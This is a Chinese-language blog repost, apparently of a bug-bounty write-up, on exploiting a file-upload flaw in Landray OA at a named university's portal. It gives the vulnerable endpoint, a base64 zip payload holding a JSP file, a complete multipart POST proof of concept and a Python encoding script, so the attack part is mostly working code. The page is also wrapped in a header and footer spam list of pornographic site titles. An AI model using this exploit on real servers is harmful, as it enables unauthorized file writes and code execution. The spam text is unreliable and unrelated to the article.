国产高清在线免费观看-国产高清在线免费无码-国产高清在线男人的天堂-国产高清在线视频-国产高清在线视频精品视频-国产高清在线视频伊甸园

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

藍凌OA漏洞SRC實戰:指紋識別->代碼執行

admin
2024年8月14日 10:0 本文熱度 1799

一.發現目標

今天不小心滲透測試其它目標時點進了北京外國語大學的一個oa登陸界面

看著有點眼熟,于是去識別了一下指紋

藍凌OA,老熟人,于是我們用一下歷史漏洞打一下這個站


二.漏洞驗證

驗證漏洞是否可以利用,可以訪問該接口

https://127.0.0.1/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload

頁面如下

成功訪問

有戲,那我們接著利用一下


三.漏洞利用

構造上傳文件,guyue.jsp和ui.ini,然后放在同一個文件夾下打包


然后將壓縮包進行base64編碼

UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA==        

poc如下

POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Content-Type: multipart/form-data; boundary=---------------------------260140030128010173621878123124
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest

-----------------------------260140030128010173621878123124
Content-Disposition: form-data; name="file"; filename="guyue.zip"
Content-Type: application/x-zip-compressed

{{base64dec(UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA==)}}
-----------------------------260140030128010173621878123124--

附上編碼腳本

import base64
import zipfile

zip_file_path = "guyue.zip"
with open(zip_file_path"rb"as file:
   zip_content = file.read()
base64_encoded = base64.b64encode(zip_content).decode("utf-8")
print(base64_encoded)

這里我踩了半個多小時的坑,需要直接將兩個文件進行壓縮,而不是先壓縮成文件夾,再進行壓縮

成功訪問到我寫入的文件路徑


四.提交src

教育src點到為止,不要上傳馬(bushi)


來源:https://mp.weixin.qq.com/s/DorHJncR89z9XvyTwalnFA


該文章在 2024/8/16 15:04:23 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 日韩a无v码在线播放免费 | 国产又粗又猛又爽又黄A片 国产又粗又猛又爽又黄A片漫 | 国产麻豆精品精东影业av网站 | 亚洲av一二三四区四色婷婷 | 国产传媒果冻天美传媒 | 性爱亚洲性爱亚洲免费性爱 | 日韩国产成人精品 | 成人国产一区二区三区精品不卡 | 无码精品人妻一区二区三区九里奈 | 午夜成人理论无码电影在 | 久久久久久成人毛片免费看 | 国产人妻无码区免费九色 | 久久精品国产99国产精2025 | 亚洲av无码成人网站国产 | 国产在线精品免费aaa片 | 日韩欧美一区二区三区在线播放 | 国产精品香蕉网页在线播放 | aaa精品精品国产91久久久 | 久久久久久午夜成人影院 | 亚洲综合日韩av无码毛片 | 国产精品爽黄69天堂a | 中字幕视频在线永久在线观看免费 | 熟妇人素无码中文字幕 | 自拍高潮了的视频网站 | 精品国产自在现线免费观看 | 亚洲欧美日韩国内综合a区 亚洲欧美日韩—级特黄在线 | 国产成人无码一区二区三区在线 | 宅男噜噜噜一区二区 | 亚洲国产麻豆 | 无码插插高潮 | 中文字幕人妻系列乱码 | 亚洲午夜无码久久久久蜜臀av | 久久久不卡国产精品一区二区 | 亚洲性夜夜综合久久麻豆 | AV色欲AV蜜臀AV久久 | 日本三级香港三级三级人!妇久 | 国产高潮呻吟无码精品AV | 在线新拍91香蕉精品国产 | 99久久精品无码一区二区毛片免费 | 偷怕视频区永久入口在线观看 | 国产女人aaa级久久久级 |